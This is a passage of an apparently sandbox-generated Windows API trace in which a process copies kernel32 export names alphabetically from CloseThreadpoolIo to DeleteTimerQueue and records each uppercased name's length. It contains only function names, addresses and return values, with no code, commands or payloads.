[0085.725] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0085.725] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0085.725] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0085.725] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0085.725] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0085.725] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0085.725] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0085.725] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0085.725] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0085.725] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0085.725] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0085.725] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0085.725] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0085.725] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0085.725] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0085.725] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0085.725] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0085.725] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0085.725] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0085.726] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0085.726] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0085.726] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0085.726] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0085.726] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0085.726] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0085.726] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0085.726] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0085.726] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0085.726] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0085.726] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0085.726] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0085.726] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0085.726] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0085.726] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0085.726] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0085.726] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0085.726] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0085.726] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0085.726] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0085.726] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0085.726] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0085.726] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0085.726] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0085.726] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0085.726] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0085.726] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0085.726] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0085.726] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0085.726] lstrlenA (lpString="COPYCONTEXT") returned 11 [0085.726] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0085.726] lstrlenA (lpString="COPYFILEA") returned 9 [0085.726] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0085.726] lstrlenA (lpString="COPYFILEEXA") returned 11 [0085.726] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0085.726] lstrlenA (lpString="COPYFILEEXW") returned 11 [0085.726] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0085.727] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0085.727] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0085.727] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0085.727] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0085.727] lstrlenA (lpString="COPYFILEW") returned 9 [0085.727] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0085.727] lstrlenA (lpString="COPYLZFILE") returned 10 [0085.727] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0085.727] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0085.727] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0085.727] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0085.727] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0085.727] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0085.727] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0085.727] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0085.727] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0085.727] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0085.727] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0085.727] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0085.727] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0085.727] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0085.727] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0085.727] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0085.727] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0085.727] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0085.727] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0085.727] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0085.727] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0085.727] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0085.727] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0085.727] lstrlenA (lpString="CREATEEVENTA") returned 12 [0085.727] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0085.727] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0085.727] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0085.727] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0085.727] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0085.728] lstrlenA (lpString="CREATEEVENTW") returned 12 [0085.728] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0085.728] lstrlenA (lpString="CREATEFIBER") returned 11 [0085.728] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0085.728] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0085.728] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0085.728] lstrlenA (lpString="CREATEFILEA") returned 11 [0085.728] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0085.728] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0085.728] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0085.728] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0085.728] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0085.728] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0085.728] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0085.728] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0085.728] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0085.728] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0085.728] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0085.728] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0085.728] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0085.728] lstrlenA (lpString="CREATEFILEW") returned 11 [0085.728] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0085.728] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0085.728] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0085.728] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0085.728] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0085.728] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0085.728] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0085.728] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0085.728] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0085.728] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0085.728] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0085.728] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0085.728] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0085.728] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0085.728] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0085.728] lstrlenA (lpString="CREATEJOBSET") returned 12 [0085.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0085.729] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0085.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0085.729] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0085.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0085.729] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0085.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0085.729] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0085.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0085.729] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0085.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0085.729] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0085.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0085.729] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0085.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0085.729] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0085.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0085.729] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0085.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0085.729] lstrlenA (lpString="CREATEPIPE") returned 10 [0085.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0085.729] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0085.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0085.729] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0085.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0085.729] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0085.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0085.729] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0085.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0085.729] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0085.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0085.729] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0085.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0085.729] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0085.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0085.729] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0085.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0085.730] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0085.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0085.730] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0085.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0085.730] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0085.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0085.730] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0085.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0085.730] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0085.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0085.730] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0085.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0085.730] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0085.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0085.730] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0085.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0085.730] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0085.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0085.730] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0085.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0085.730] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0085.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0085.730] lstrlenA (lpString="CREATETHREAD") returned 12 [0085.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0085.730] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0085.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0085.730] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0085.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0085.730] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0085.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0085.730] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0085.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0085.730] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0085.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0085.730] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0085.730] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0085.731] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0085.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0085.731] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0085.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0085.731] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0085.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0085.731] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0085.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0085.731] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0085.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0085.731] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0085.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0085.731] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0085.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0085.731] lstrlenA (lpString="CTRLROUTINE") returned 11 [0085.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0085.731] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0085.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0085.731] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0085.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0085.731] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0085.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0085.731] lstrlenA (lpString="DEBUGBREAK") returned 10 [0085.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0085.731] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0085.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0085.731] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0085.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0085.731] lstrlenA (lpString="DECODEPOINTER") returned 13 [0085.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0085.731] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0085.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0085.731] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0085.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0085.731] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0085.731] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0085.731] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0085.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0085.732] lstrlenA (lpString="DELETEATOM") returned 10 [0085.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0085.732] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0085.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0085.732] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0085.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0085.732] lstrlenA (lpString="DELETEFIBER") returned 11 [0085.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0085.732] lstrlenA (lpString="DELETEFILEA") returned 11 [0085.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0085.732] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0085.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0085.732] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0085.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0085.732] lstrlenA (lpString="DELETEFILEW") returned 11 [0085.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0085.732] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0085.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0085.732] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0085.732] lstrcpyA (in: lpString1=0x3f2cf70, 